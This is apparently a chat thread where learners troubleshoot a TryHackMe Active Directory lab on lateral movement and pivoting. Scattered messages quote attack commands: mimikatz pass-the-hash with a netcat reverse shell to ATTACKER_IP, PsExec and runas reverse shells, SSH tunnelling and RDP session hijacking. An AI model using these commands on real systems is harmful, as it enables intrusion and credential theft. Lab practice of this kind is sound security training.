[] Exploit completed, but no session was created.

I've already have an SSH connection with tunneluser.
On that connection I got the following messge after running metasploit:
"connect_to thmdc.za.tryhackme.com port 80: failed."

Any idea?

The server needs to be restarted......plx.

Hi there!

Which subnet are you in?

Some users would get annoyed if there was x amount of resets and 0 of them where for your actual subnet.

Yesterday I was doing Lateral Movement task 7 Tunneling Complex Exploits. I couldn't access the server. I tried several ways and nothing. Sorry if It woas disturbing.

Yeah, but if you want people to reset the server, you're going to have to state the subnet you're in.

Third octet in the THMDC will let you know.

ok, thx. Maybe you can tell me what the error was about...
After setting all the metasploits options I got this result:
[] Started reverse TCP handler on 127.0.0.1:8989
[] Using URL: http://thmjmp2.za.tryhackme.com:7777/wTPndpwdZls3vfc
[] Server started.
[] Sending a malicious request to /
[] Server stopped.
[] Exploit completed, but no session was created.

I've already have an SSH connection with tunneluser.
On that connection I got the following messge after running metasploit:
"connect_to thmdc.za.tryhackme.com port 80: failed."

Not sure if you got an answer but i had the same this morning and i just downloaded a new VPN file and issue was gone.

Hi, i just started the Laterla movement and pivoting and and started with an issue ( i just wrote the solution for a colleague just above ) but i want to follow the indications word by word. It asks me to run:

systemd-resolve --interface lateralmovement --set-dns $THMDCIP --set-domain za.tryhackme.com

When i run that (replacing obviously the IP) it seems systemd-resolve does not come by default (as many say). I googled it and it say sto run the below:

apt install systemd-resolved

once its finished i tried again and the same effect. when i check what options i have with systemd this is the result:

i usually would populate /etc/hosts or /etc/resolv.conf

and good to go

but i want to figure this out

any help?

well, after simply adding an entry to /etc/hosts i can actually do nslooup perfectly but when i try to go to the distributor to get the credentials, it's not working 😄

For whatever reason, I don't have the lateralmovement interface defined in the attack box

The previous rooms in this series worked flawlessly. this one is not behaving like the others

Did you open an attackbox in the Lateral room?

I did. I even terminated it and tried to restart it in the room, twice

ip a shows enumad but not lateral

What interfaces do you have?

lo
ens5
enumad
docker0
veth22e29e2@if5
veth0f22abb@if7

When I was doing the enum room yesterday, i had interfaces for all the ad rooms

I'm going to boot one up. 🙂

Okay appreciate the help!

im on network 100.200.51.x/24 if that matters

I got one for lateral.

hmm

i see theres a folder with network configs on the attack box, is there a way for me to manually apply it?

I'm not sure, regarding the attackbox

im going to try terminating the box, logging out, logging back in and relaunching

That sounds good. 🙂

Remember to start the attakbox in the room

ok so i did that and it didnt work but i noticed something odd

The lateralmovement and pivoting file is empty

MIght have to try this later from my own Kali VM instead

That would be better.

i think i figured it out @feral granite

I went to https://tryhackme.com/access?type=networks and selected the lateralmovementandpivoting from the dropdown and regenerated my configuration and downloaded it

Then I terminated and restarted the Attack box and it had the interface

add it to the kb if anyone else has a similar issue 🙂

Ah, there we go

i cannot able to get shell using psexec64

anything i missed?

im not getting shell guys please help

this also not getting connection back

any help

and the solution is to use windows/shell_reverse_tcp

if you are not using metasploit

Someone that would be so kind of sparing 5 mins to guide me through the initial setup of the lab?

What do you need help with?

the dns setup. I think we've spoken in the past but i think it wasn't really clear to me

The server needs to be restarted

THMIIS don't respond

What subnet? You can also vote for a reset yourself once every hour.

i can't ping the DC.

can somebody help?

THM says that I am connected on the "Connection" page.

Is the DC windows?

yes

So you can't most Wondows machines by default.

yes but the DNS resolution is failing too.

ok I resolved . my network manager didn't restarted properly.

Help me in this too

I'm getting same issue

Dns resolution failing

Also everytime I have to change my resolv.conf to 8.8.8.8 to use internet . I can't use internet before doing this setting need help in this too

There are no URLs in that message.

hi, can someone please vote for resets on https://tryhackme.com/room/lateralmovementandpivoting the jmphost2 machine is broken

Probably better stating your subnet.

If 15 people reset and they're not even in your subnet..

Hi all! [Task 7] - RDP Hijack. I'm attempting to hijack a RDP session however getting user/pass incorrect. Anyone run into anything similar?

(running with administrator priv on cmd)

[solved] - had to upgrade privs! 🙂

Hello, I have a question about attack techniques.
I have one machine A at 192.168.20.0/24, two machines B and C at 192.168.120.0/24. I was able to attack and get privileges on machine B, as well as Pivot from machine B to attack machine C. But what I can do is just operate through the Web Shell available on machine C. So how? Can I create a Reverse Shell from machine C back to my machine A? Any keywords or articles on this matter would be welcome, I would greatly appreciate it.
Sincerely thank

Hav a feeling I'll be needing some help getting through this AD part of the CompTIA Pentest+ path. If anyone else wants help or work together lmk. I'll provide what advice I can in return.

hello, I am doing Windows- Lateral Movement and Pivoting-Abusing User Behaviour . I cannot get the credentials at http://distributor.za.tryhackme.com/creds_t2 to start the task. The network state is running and started. openvpn is on. Had no issues connected with the network until now. Cant connect to server...

Cant seem to get the ptt attack to work. Ive tried both t1_toby.beck tickets and keep getting the same error.

• File: '[0;2f49e9]-2-0-40e10000-t1_toby.beck@krbtgt-ZA.TRYHACKME.COM.kirbi': ERROR kuhl_m_kerberos_ptt_data ; LsaCallAuthentica
  tionPackage KerbSubmitTicketMessage / Package : c0000133
  ERROR kuhl_m_kerberos_ptt_file ; LsaCallKerberosPackage c0000133

• File: '[0;9c65b]-2-0-40e10000-t1_toby.beck@krbtgt-ZA.TRYHACKME.COM.kirbi': ERROR kuhl_m_kerberos_ptt_data ; LsaCallAuthenticat
  ionPackage KerbSubmitTicketMessage / Package : c0000133
  ERROR kuhl_m_kerberos_ptt_file ; LsaCallKerberosPackage c0000133

hi, someone have a problem to ping to thmiis machine?

someone?

@feral granite

nevermind, i resolved it

Guys I am connected to my machine vias SSH but when I run msf I get the following. Any ideas what is wrong?

Nvm did more reading in the Discord and it worked by replacing the name with IP

Is the LHOST correct or can access from target machine?

Hi, I am going through Lateral Movement and Pivoting room. When signed in to thmjmp2 with provided credentials, I cannot find the mimikatz executable in C:\Tools. According to description it should be there. How can I get it back?

Hello everyone. I have an issue regarding Remote Process Creation using WMI. I logged on the THMJMP2 using the account that is in Tier 1 Admins group (t1_corine.waters). From THMJMP2 I execute wmic /node:10.200.104.201 process call create "cmd.exe /c whoami" just to test if it will fail. I have ERROR: Description=Access denied
I also tried putting the full command

de:10.200.104.201 process call create "cmd.exe /c whoami"```
Any ideas?

I haven't confirmed, but it's probably not enabled or permissions are not in place. For example if you just run "wmic process call create whoami" on thmjmp2, you also get access denied. To set up the permissions to make it work, you can use GPO/LPO to do that.

I guess it is because it is deprecated? I am not sure - the server is Windows 2016 Datacenter

it is for win10+ and server 2022+, but in this case, I think it's just not configured to allow usage

Hi guys, I have some questions, please if you can clarify it for me, we have t1_leonard.summers with admin access:

1. I can use this account to connect directly via SSH to THMIIS, but I can't read the flag.exe file, why?

2. I created a reverse shell binary and uploaded it to THMIIS, used t1_leonard.summers to access THMJMP2 via SSH, from there I used sc.exe to start the service and got the shell with nt authority\system session, Why does it work without having to use runas.exe?

1. flag.exe checks to be sure you connected using a windows/shell/reverse_tcp shell

2. sc.exe, by default (as far as I know) creates services as SYSTEM unless you specify a username. The fact that you're creating the service as a particular user does not make that service run as that user by default.

1. So here, the challenge was like this, but in the real world for example, if we already see that this founding account has SSH access to another machine, then we don't need to think about going through the reverse shell, yeah?

Correct.

If you don't want to maintain persistence connection to the target victim you can use the jump host to connect to the victim and do let's say one shot activity. But what happens if you loose the jump host connection and you won't be able to access the victim (in scenario where only from jmp host you can access the victim). If you want to maintain persistence I think it is always preferable to use reverse shell. Similar analogy to bind/reverse shell.

i still create a backdoor, when i got some machine

@weary torrent @frank heath @swift crater thank you guys

Gave +1 Rep to @weary torrent (current: #423 - 10)

I'm stuck on Task 3. I think I'm supposed to open a reverse shell from JMP2 to the Attackbox, with elevated privileges, using the runas /user:t1_guy command, but it just gives me a shell with the same user. (I suppose that I must be the t1-guy, to be able to create the service with sc.exe in the next step.)

Why would "runas /user: ..." fail silently, (and instead run the command as the calling user), when given valid credentials for the t1 user?

Solution: I had to switch to Remote Desktop for the unprived user. The runas step didn't work when connected by SSH.

I guess this is due to how UAC works.

The task mentions this: "Still, we only have SSH access to the machine, so if we tried something like runas /netonly /user:ZA\t1_leonard.summers cmd.exe, the new command prompt would spawn on the user's session, but we would have no access to it. To overcome this problem, we can use runas to spawn a second reverse shell with t1_leonard.summers access token:" So to get access, the runas can be used to spawn a shell.

@weary torrent I don't think the indirection via 'nc' adds anything, privilege-wise.

Correct it doesn't, it's to illustrate the limitations of runas in an SSH environment (say RDP was unavailable).

Lesson learned, fwiw. 🙂

Same problems here.. I did the following and downloaded myself

Attackbox:

1. Download https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20220919
2. Extract contents.
3. Run "python3 -m http.server 8080"

THMJMP2:

1. SSH to the THMJMP2 server following the room steps as you would normally.
2. The SSH session will be a CMD session, uplift to Powershell.
3. Change directory to C:\Tools\
4. Download Mimikatz.exe from your Attackbox python http server "wget http://<ATTACKBOX_LATERALMOVEMENT_IP>:8080/x64/mimikatz.exe"
5. You can now run .\mimikatz.exe and carry on with the rest of the room.

enjoy

I have some error on the RDP Hijacking part. I just connected with RDP to the server with credentials from http://distributor.za.tryhackme.com/creds_t2

Could not connect sessionID 7 to sessionname rdp-tcp#51, Error code 1326
Error [1326]:The user name or password is incorrect.

I tried to attach my SESSION represented by rdp-tcp#51 to ID 7 owned by t1_toby.beck2 (tried with other IDs also)

Thank you very much, @near cloud. I will try it.

Gave +1 Rep to @near cloud (current: #1967 - 1)

According to my notes, you have to be system. So "psexec.exe -s cmd.exe" (whoami to verify), and you can then tscon to one of the disconnected sessions.

I thought Administrator privilege will be sufficient but apparently you need to be SYSTEM - it was written though, Thanks Sir No1

Gave +1 Rep to @weary torrent (current: #392 - 11)

hi .. i was run my vpn file for lateral movement and it's run ... how to configure the DNS?
I was do what i know from breaching AD and frmo enumerationAD but still cannot nslookup za.tryhackme.com should i start the network room forst before setting up the vpn ?

but the network was start

nvm i was solved it ..

i am using THMJMP2 and try using mimikatz got error

mimikatz # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061

Can somebody tell me why ?

You logged in as t2_felicia.dean?

Yups … i was finish, but what the diff between ssh and rdp ? When using RDP that error occur

hello guys, i have a question please, why when using "Installing MSI packages through WMI" i have an access as "authority system", but when i did the same thing by using "Remote Process Creation Using WMI" it gives me an access as "za\t1_corine.waters" ?

i created a .exe payload and i uploaded it to the THMIIS, so in the THMJMP2 i did:

PS C:\Users\bradley.cook> $Command = "powershell.exe -command Start-Process -FilePath 'C:\Windows\myinstaller.exe'"

so in the metasploit i got:

C:\Users\t1_corine.waters\Desktop>whoami
whoami
za\t1_corine.waters

C:\Users\t1_corine.waters\Desktop>flag.exe
flag.exe
Sorry! You are still missing something. No flag for you yet. (1)

does ZA.TRYHACKME.COM\t1_leonard.summers account get locked out after to many failed attemtps? I can get the EZpass4eve password to work

Thank you

Gave +1 Rep to @near cloud (current: #1313 - 2)

Mimikatz is still not downloaded in THMJMP2 in C:\tools

users have to download it manually

No flag on t1_toby.beck's Desktop

@shadow linden It looks like the Windows Defender quarantined both mimikatz and the flag on t1_toby.beck's Desktop. The room can't be completed because of this

Also, I got a shell as t1_toby.beck and was able to see Administrators' Desktop files. I don't know if that should be possible but I was expecting an Access denied message (im a noob tho)

You do not need that on the THMJMP2 tools already on THMJMP1 don’t you? You just need login with creds for that box.

i have this:
"mimikatz # token::revert
mimikatz # sekurlsa::pth /user:bob.jenkins /domain:za.tryhackme.com /ntlm:6b4a57f67805a663c818106dc0648484 /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 5555"

Notice we used token::revert to reestablish our original token privileges, as trying to pass-the-hash with an elevated token won't work. "

Can someone please explain me what does main "token::revert used to reestablish our original token privileges" ?

Why would one like to switch to the target's native shell (Like CMD in a Windows target) from the Meterpreter?
In which commands/operations should he do that?

That's a different machine, the task is telling you to ssh into THMJMP2 and execute Mimikatz there. But the Box had some issues with firewall so mimikatz was quarantined.

CMD and PowerShell have their own tools and languages that you can use, but noone can really tell you in which operations you should do that because it's situational and you will later come across some of these situations if you keep studying

One example would be Task 4 in this room "Moving Laterally Using WMI" where you have to use PS

uploading it with samba

Downloading it from github is faster lol

I tried samba but I was googling for too long for the commands

smbclient -c 'put file.msi' -U t1_corine.waters -W ZA '//thmiis.za.tryhackme.com/admin$/' password_corine.waters

Thanks bro Ill write it in my notes

Gave +1 Rep to @swift crater (current: #313 - 14)

no prob, I just need to read carefully and follow the step by step. they was in there and add some logic to follow the right step.

a little mistake can make you back from beginning again.

Yep 👍

If lsass pulls the hash values from memory while dumping, How can I get the information of the entered users before the computer is restarted? I performed the lsa dump with Crackmapexec and how did I obtain the hash value of the Administrator user that I logged into 20 days ago on the win10 computer in the AD environment?

could someone please vote for a reset?

which subnet

it just rebooted, but thanks^^

Hey guys

When I run the psexec64 command shown below with the user t1_leonard.summers and password, I get access denied error

I am running this command from the jump host

I know that this isnt the “intended” way. However the description states that it should work

maybe you need to open said terminal in administrator mode

I ssh into the jmp machine with my generated creds. How can I open a admin cmd?

ah.... well dunno then

To run psexec, we only need to supply the required administrator credentials for the remote host and the command we want to run (psexec64.exe is available under C:\tools in THMJMP2 for your convenience):

psexec64.exe \MACHINE_IP -u Administrator -p Mypass123 -i cmd.exe

This what the task states

maybe you need to use rdp

hello everyone, please can you tell me if there is a problem on "Lateral Movement and Pivoting"n it's not working for me, Network state: Resetting from yesterday

Try to leave and rejoin the room

it's work now, thank you bro

Gave +1 Rep to @tacit rivet (current: #86 - 72)

Hello everyone, I'm having an issue with room Lateral Movement and Pivoting.
Every machines seems to be offline. Network state is running, webpage is refreshed, my VPN connection is OK, reset is 1/5...

Someone can help me ?

Anyone able to assist, I on the part where I create a nc session with the administrator account, I run "nc -lvp 4443" in one terminal window, then I run "runas /netonly /user:ZA.TRYHACKME.COM\t1_leonard.summers "c:\tools\nc64.exe -e cmd.exe 10.10.201.140 4443"" in the ssh session with my user, and the shell just never comes up. I'm not sure what I'm doing wrong

So I realized what I was doing wrote with that part, I needed to use the IP address from the lateralmovement interface I established. which was a dumb mistake... except now my DNS has just stopped working, and I cant ping anything on the network I supposed to be moving around in

and systemctl restart systemd-resolved did not fix the issue at all

Hello Guys! Could someone help me to setup Network OpenVPN on Kali?

I'm connected to the network, but I should configure my DNS.

I'm trying to follow the decription in the Room:

Network Manager -> Advanced Network Configuration -> Your Connection -> IPv4 Settings
Set your DNS IP here to the IP for THMDC in the network diagram above
Add another DNS such as 1.1.1.1 or similar to ensure you still have internet access

Yeah, don't use the GUI.

Edit your resolve.conf file.

Okay. And what should I do there?

I have these two.

/etc/resolv.conf

Check the #breaching-ad pinned posts, and take my steps and apply it to this room.

Alright! I'll take a look.

@feral granite I appreciate all your help man! Once I'll get you a beer! 😄

I probably will have a lot more question in the future

Hey all I'm getting channel_setup_fwd_listener_tcpip: cannot listen to port: 6666
bind [10.50.65.127]:7878: Unknown error
channel_setup_fwd_listener_tcpip: cannot listen to port: 7878
Could not request local forwarding.

When attempt to initiate the ssh tunnel, for the last flag. I've tried a few different things and still can get this working.

The command:
ssh tunneluser@10.50.65.127 -R 8888:thmdc.za.tryhackme.com:8
0 -L 10.50.65.127:6666:127.0.0.1:6666 -L 10.50.65.127:7878:127.0.0.1:7878 -N

Not sure where I'm messing up

I'm afraid I'm still unable to connect. 😦 I left the room as well. I regenerated the Network VPN as well.

Ping the address works

Edited the resolv.cof file with the IP on top

Try sudo.

Same.

Can you access this site? http://distributor.za.tryhackme.com/creds

Yeah. Just tried it 😄

In this case, the problem is with nslookup?

But the rest should work?

If the link works, yeah.

Don't worry about nslookup

Okay then. Thanks. Have a good day! Wish me luck 😄

Hello @ all

Network is still resetting? Displaying this for a quite long 😢

So this has been the single most frustrating room on TryHackMe... I realize the other two posts I made here were my own dumb mistakes due to me not reading directions or pinned comments... so I understand why I was ignored. However, this time I'm completely at a loss. I'm on task 6, I generated the new t2 credentials on the new credential page, then when I try to rdp into THMJMP2 with xfreerdp /v:thmjmp2.za.tryhackme.com /u:t2_jessica.richards /p:o6R9PfosU the xfreerdp window opens, then gives me a bad password error, when I retype the password into the login window I get a bad password error again. I've generated new credentials thinking that maybe there was a problem with the page that makes them, and gotten the same result. Now, the really confusing part is this. if I present the wrong credentials to the xfreerdp command by changing the username or password the command fails with a "Error: protocol security negotiation or connection failure" message in the terminal. So like the remote server knows that I'm presenting the correct credentials, but they aren't correct.

this same thing was happening to me, so i just logged on without using the /p:password

xfreerdp /v:ip_of_thmjmp2 /u:rick.ross

this box has been resetting all day

Can someone please fix this network? Keeps resetting since 2 days.

Okay i had to leave the room and rejoin. Now it is working.

Is anyone else having trouble with the Attack Box in this room? Every time I start it, it is missing the "lateralmovement" interface. That seems to be set up by an OpenVPN config that is downloaded from S3 when the Attack Box starts - but the file it is downloading is 0 bytes.

Hi, the room is in resetting mode since probably 15th, does anyone know something?

try and leave the room for 15 mins and joining back again. Then setup with the DC IP. it should work

ssh za\t2_felicia.dean@thmjmp2.za.tryhackme.com
ssh: connect to host thmjmp2.za.tryhackme.com port 22: No route to host
I got this error after I forgot to extend the network and it stopped. I am able to visit distributor site though.

what worked for me in the past with these AD rooms is you leave the room by clicking on the cog wheel and clicking "leave room"

then join back after 15 mins and reconnecting with the open vpn file

my issue now is that I cannot connect to this felicia.dean account even when I type in the correct password.

maybe I have to try once more and stop feeling sorry for myself

Hi folks, someone experiencing in the task3 the t1_leonard.summers/desktop folder is empty, no flag.exe there

you can just add the host to your /etc/hosts file or just use the ip instead of the fqdn

damn son, nvm

That’s a spirit

trying to do this room and the C:\tools directory is empty on THMJMP2 where the command in task 3 is saying to run nc64.exe out of there. Anyone else experience this?

I went ahead and voted for a reset but it's only 2/5 so I guess I wait.

after reset the file was back. I see someone else is dropping files in the c:\tools directory like crazy and perhaps wiped out nc64.exe & others when they tried to clean up. if you run into what I sent above, vote for reset or find a way to copy nc64.exe back to THMJMP2. I kept getting access denied when I tried copying from THMIIS.

drop into another dir

make sure you have perms in it

I finished that a couple days ago. The permission error I was getting was because that user did not have access to that server as I recall

either way, I was only attempting to copy that file over because someone had wiped out the tools directory and screwed everyone else over. the reset fixed that and put the file back

https://imgur.com/doxok9X Im stuck on TASK 3 of this room, well the side mission, been trying to solve with PSexec, I get a shell on the THMIIS machine as t1_leonard.summers, which shown in the image. However when I go to open the Flag I get "Sorry! You are still missing something. No flag for you yet." but I can't think of what step I have missed? Has anyone got a step by step or offer up a clue? I used PsExec64.exe \\thmiis.za.tryhackme.com -u ZA.TRYHACKME.COM\t1_leonard.summers -p EZpass4ever -accepteula -i c:\tools\nc64.exe -e cmd.exe 10.50.89.29 4445 to get the shell I presume this is the correct method? Any help would be appreciated, I think im on the right path...

You can verify your account to upload the image

may be you miss to escalate privilege as nt administrator

trying to start this room by following the instructions, but no luck

i checked and lab is up, not sure what else I can do

tried the same thing from kali

got it to work with attackbox after leaving and entering the room multiple times....very finicky lab

Still having this problem on Task 3, im running as system but still no flag, this is using the PSexec method, im clearly not understanding something properly if someone could help me out would be much appreciated

In Task6,Unable to obtain system permissions

I get certs through this link

mimikatz showed disconnected all of a sudden

OMG I was just searching for answers for the same question and found your answer...it just unstuck me. 😂😂😂

yo

anyone got some insight on SMB relay over pivot

I got a diagram I want to share and see if I can get some insight. I was told to diagram my setup and TR. Kinda need some help

hello, i am doing the laterlamovement room, but I'm having trouble connecting to the network, i ran the command to configure the dng with THMDC ip but when i do nslookup it fails. i also tried from kali with network manager but it failed too, would it be possible to get any help?

i also tried on the kali by inserting the ip in the DNS section of the IPV4 of my connection and resetting network manager but its not workin

Add the THMDC to /etc/resolv.conf

Hey did this work ? anf if yes how did you fixed it

I can not seem to get impacket to work over proxychains

ssh -i user@ip -D 9050

My problem was different as I recall. I had found that someone had emptied the C:\Tools directory and so I didn't have the nc64.exe executable. It's been a minute so I might have some details wrong

Yeah The ad of tryhackme has a lot of problems

This is a good way to troubleshoot problems you may encounter on your own.

funny how the same issues still happen on t1_toby.beck since 2022 without any answers on what's going on hahaha

another case of t1_toby.beck with no ticket at all

and sekurlsa::tickets /export running for 5 real minutes non stop with a bunch of t1_toby.beck, t1_toby.beck2, t1_toby.beck3, t1_toby.beck4, t1_toby.beck5, t1_toby.beck6

So I was connecting to WMI from powershell, and i had a rdp session running,
when i tried Invoking CimMethod, it gave me return value 3, which basically means incorrect registery permissions, however when i tried the same with an ssh session, it worked.. is there any specific reason why?

I have the same problem. Did you solve the problem ?

Coming a bit late probably
Maybe this message will help you: #site-support message
Go back in that message chain for more context

anyone else have trouble just connecting via ssh to the machine? as soon as I try to connect, connection immediately closes. Tried few different times now over a couple days.

Is that a mistake in the Description or am I missing something?

In the command Dynamic should use -D instead of -R, right?

Another thing I need some help with... At the Port Forwarding section, at the end by the Exploit...

How am I suppose to discover that open port for myself?

I tried many different nmap scan, but I can see it's only filtered.

I tried through a Dynamic Proxy as well, but still Filtered.

How can I discover that there is a HTTP running?

Seems that the network isn't working since yesterday already, or is it just me?

error: Cannot ioctl TUNSETIFF lateralmovement: Device or resource busy (errno=16)

I have just been able to do Task 1, both with the AttackBox and my own local Kali VM
I have noted some changes over the past 24-48 hours for that network: before, on the AttackBox, you had to use the VPN, as there was an issue; that issue seems to have gone: the lateralmovement interface is there for you automatically (in addition to interaces for other networks, like persistad for instance)
if you use the VPN, one trick that usually works if you cannot ping the DC, is to regenerate the VPN (I had to do it 20 minutes ago)
in case you keep having issues, please share screenshots, and I'll compare them with my side

Ah yea...thanks. The issue was, that they resolved their issue

Network still not working, or is it me? I tried to regenerate the vpn, got the greenlight on access but couldnt access the creds page after adding the ip to ipv4 settings and restarting NetworkManager.

Disregard, I got it working on the attackbox. Just wont work on my kali laptop 😐

Actually, I'm just a moron and entered the wrong IP on my laptop.

im solving AD labs lateral movement and poivaiting when i crating sc task to run THM they give access denied ? why ? how can i solve
ignore spells

Rather aggravating. The ssh keeps timing out on Task 7. Re-entered everything several times.. yet still times out and will not make that call from socat listener in THMJMP2.

MIMIKATZ is missing from thmjmp2. I have uploaded the exe from my attackbox but its never there when I go to run it. Is Defender deleting the file as soon as I upload it?

As per the documentation, the web based attack box should be able to ping the DC but this is not the case with me. Please guide.

I am getting Destination Host Unreachable

please do not multipost: same message in muliiple channels is not nice
I have answered to you in #site-support

hi all, any idea why this is happening

Smh it can't dump the las

Hi,

I'm on Task 6 Abusing User Behaviour, similar with Task 7 Port Forwarding

THMJMP2 via RDP
xfreerdp /v:thmjmp2.za.tryhackme.com /u:YOUR_USER /p:YOUR_PASSWORD

Using Kali, I keep getting this error:

[07:13:48:067] [1151360:1151361] [ERROR][com.freerdp.core.connection] - Timeout waiting for activation
[07:13:48:068] [1151360:1151360] [ERROR][com.freerdp.core] - freerdp_abort_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_CANCELLED [0x0002000B]

If using AttackBox it's working.

Anybody knows the fix?

Thank you

got it fixed by adding /timeout:10000 /cert:ignore

xfreerdp /v:THMJMP2.za.tryhackme.com:13389 /u:Username /p:Password /timeout:100000 /cert:ignore

dose anyone have a problem in the room

i can not start it

Hello, let me try to see if I can replicate the issue.

Leave the Network (Options > Leave) and rejoin the room, and it will work. The error message can be improved on the room page. The real reason it fails, is because (in the system) you are no longer in the subnet network, so leaving and rejoining fixes that. 🙂

thank you for the help

Gave +1 Rep to @latent owl (current: #16 - 487)

it works 🥰

I'm having the same issue... have you been able to solve it?

my bad... I was using the attack box and didn't properly read the end of the Introduction section:

If you are using the AttackBox and have joined other network rooms before, be sure to select the IP address assigned to the tunnel interface facing the lateralmovementandpivoting network as your ATTACKER_IP, or else your reverse shells/connections won't work properly. For your convenience, the interface attached to this network is called lateralmovement, so you should be able to get the right IP address by running ip add show lateralmovement

However I have a question: if I have the credentials for t1_leonard.summers, why can't I just directly ssh to thmiis with his credentails instead of using all these rev shells? If I do that I can see that I'm not nt authority but just t1_leonard.summers. How can I elevate from there?

Am I crazy or does THMJMP2 not have SSH client installed on it? Working on lateralmovementandpivoting > Port Forwarding > Tunnelling Complex Exploits > "Putting the whole command together, we would end up with the following:"

Oh weird, it's on path for cmd but not for powershell

hello guys

I am having an issue with the attackbox when resolving the DNS for THMDC. Any suggestions?

Error: Failed to resolve interface "lateralmovement": No such device

solved

Hi guys,
Im having issues iwth the DNS from attackbox, Im doing the instructions form the introduction but Im not able to resolve the domain:

root@ip-10-10-252-163:~# THMDCIP=10.200.48.101
root@ip-10-10-252-163:~# systemd-resolve --interface lateralmovement --set-dns $THMDCIP --set-domain za.tryhackme.com
root@ip-10-10-252-163:~# nslookup thmdc.za.tryhackme.com
Server:        127.0.0.53
Address:    127.0.0.53#53

** server can't find thmdc.za.tryhackme.com: NXDOMAIN

any idea?

Solve updating file /etc/resolv.conf

hello, i am doing the laterlamovement room, i am trying to perform a pass-the-ticket attack but i do not seem to get any additional permissions by doing so. I export the tickets with mimikatz and inject a TGT into the Session with mimikatz. After which i tried to run PsExec, Misc::CMD, query SMB and so on but i do not seem to have any additional permissions. Am i doing something wrong? Edit: i am using the ticket of the t2_felicia user which has local administrator permissions.

hello, I need help with DNS resolution. I'm trying to resolve thmdc.za.tryhackme.com with nslookup but it is giving me a recursion error

nslookup thmdc.za.tryhackme.com
;; Got recursion not available from 10.200.48.101, trying next server
Server:        8.8.8.8
Address:    8.8.8.8#53

** server can't find thmdc.za.tryhackme.com: NXDOMAIN

It only works when i explicitly mention the dns ip

nslookup thmdc.za.tryhackme.com 10.200.48.101
Server:        10.200.48.101
Address:    10.200.48.101#53

Name:    thmdc.za.tryhackme.com
Address: 10.200.48.101

• it's happening for all the domain resolutions

But when i use my browser i can resolve distributer.za.tryhackme.com

my resolv.conf configuration:

# Generated by NetworkManager
search localdomain
nameserver 10.200.48.101
nameserver 8.8.8.8
nameserver 192.168.177.2

my route table:

10.50.46.0  0.0.0.0 255.255.255.0  U  0 0 0 lateralmovement
10.200.48.0 10.50.46.1 255.255.255.0UG 1000 0 0 lateralmovement

any help will be appreciated.

It has been fixed, only had to reset the network.

Be me.. Spending an hour figuring out why my reverse shell with the service was not working. Found my NIC on attack machine changed so my msfvenom payload had the old value 😭

Was fun to research why. Got to use PSSession to remote into the host so I could verify my payload was actually in ADMIN$ and that the service specified the correct destination.

Check dnsmaq.service next time it happens

I am wondering why I should use thmjmp2 to thmiis.. Because already gave t1_leonard.summers as user and password also provided why I should do lateralmovement.. For this case.. Were can directly connect to it using ssh

If I'm not mistaken, the SSH is a port that is open by default on most THM machines just in case.
So in the case of this room, you just have to pretend that SSH doesn't exist, and this is how you can do lateral movement.

Thank you

Gave +1 Rep to @whole ember (current: #77 - 112)

Can someone reset the network please?

SSH isn't even working anymore.

i might need someone to reset the network, the network stopped and after restarting my machine refused to resolve any domain in the network. Thank you

i might need someone to reset the network, someone removed the mimikatz. Thanks

Hi! I think the network needs to be reset. I can ping the THMJMP2 with IP, but not THMDC

┌──(kali㉿kali)-[~/tryhackme/ad_lateral]
└─$ nslookup thmdc.za.tryhackme.com 10.200.51.101
;; communications error to 10.200.51.101#53: timed out
;; communications error to 10.200.51.101#53: timed out
;; communications error to 10.200.51.101#53: timed out
;; no servers could be reached           

┌──(kali㉿kali)-[~/tryhackme/ad_lateral]
└─$ ping 10.200.51.101                           
PING 10.200.51.101 (10.200.51.101) 56(84) bytes of data.
^C
--- 10.200.51.101 ping statistics ---
178 packets transmitted, 0 received, 100% packet loss, time 181756ms
                                                                                                                 
┌──(kali㉿kali)-[~/tryhackme/ad_lateral]
└─$ ping 10.200.51.249                           
PING 10.200.51.249 (10.200.51.249) 56(84) bytes of data.
64 bytes from 10.200.51.249: icmp_seq=1 ttl=127 time=129 ms
64 bytes from 10.200.51.249: icmp_seq=2 ttl=127 time=48.8 ms
64 bytes from 10.200.51.249: icmp_seq=3 ttl=127 time=63.4 ms
^C
--- 10.200.51.249 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2024ms
rtt min/avg/max/mdev = 48.773/80.500/129.284/35.011 ms

In Task 5, are all Pass-the-Hash, Pass-the-Ticket and Pass-the-Key possible? I succeeded using PtH and PtK, but did not find a ticket for t1_toby.beck?

I am in room - Lateral Movement and Pivoting, task 4 Moving Laterally Using WMI. I followed the instruction and got the flag via Installing MSI packages through WMI. Then I played around and tried to do the same by creating a remote process using WMI; I got it working but at the end, it said I am still missing something and no flag for me. Anyone know the reason why?

was it the payload? or the way the payload uploaded to THMIIS target machine? Any feedback appreciated. thanks

all three worked for me.

my mimikatz.exe is missing from falicia machine !?

I'm working on Task 2, and when I use runas with Leonard's creds to get a reverse shell back to my box, it doesn't appear to run as Leonard. When I type whoami in the resulting shell, I'm the user I'm logged onto ssh as

Huh. It seems like it works anyway though

mimikatz just disappeared on the THMJMP2 machine when I was in the middle of using it. It was there in C:\tools then disappeared after I used it

.

mimikatz is still not on the t2_felicia.dean@thmjmp2 machine. This is starting to get irritating

in Task 7, I cannot ssh to the tunneluser I created on my kali VM, im using ssh tunneluser@<lateralmovementIP> and times out. Also, in the Attack Box, even after adding the THMDC to the resolv-dnsmasq and nslookup will resolve the IP, the creds site isn't accessible on the Attack Box, I can access it on my Kali VM when connected thru openVPN but not the Attack Box. This room needs some attention.

check that the interface is up, I just tried and It was not on there, even though I start the AttackBox from that room

Hi , i am actually struggling to use mimikatz , i have this output when i run privilege::debug : ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061

i give up , i'm gonna try to sleep

With, for example, uploading an msi and running it using wmi. Does the upload using smb to /admin$/directly place the msi in C:\Windows\? Like is that share directly connected to that directory? And if this share is not available, could I upload it to a different share and use that path in the Invoke-CimMethod?

Why does nslookup timeout when it was working completey fine?

nslookup thmdc.za.tryhackme.com

;; communications error to ::1#53: timed out
Server:         ::1
Address:        ::1#53

** server can't find thmdc.za.tryhackme.com: NXDOMAIN

And what is the proper way to reset everything so I can set up again from scratch?

@whole ember @gilded zephyr Spammer (sorry I don't know how to properly ping the mod group)

the network diagram was like greyed out for two days and this solved it, thank you very much

Gave +1 Rep to @latent owl (current: #17 - 576)

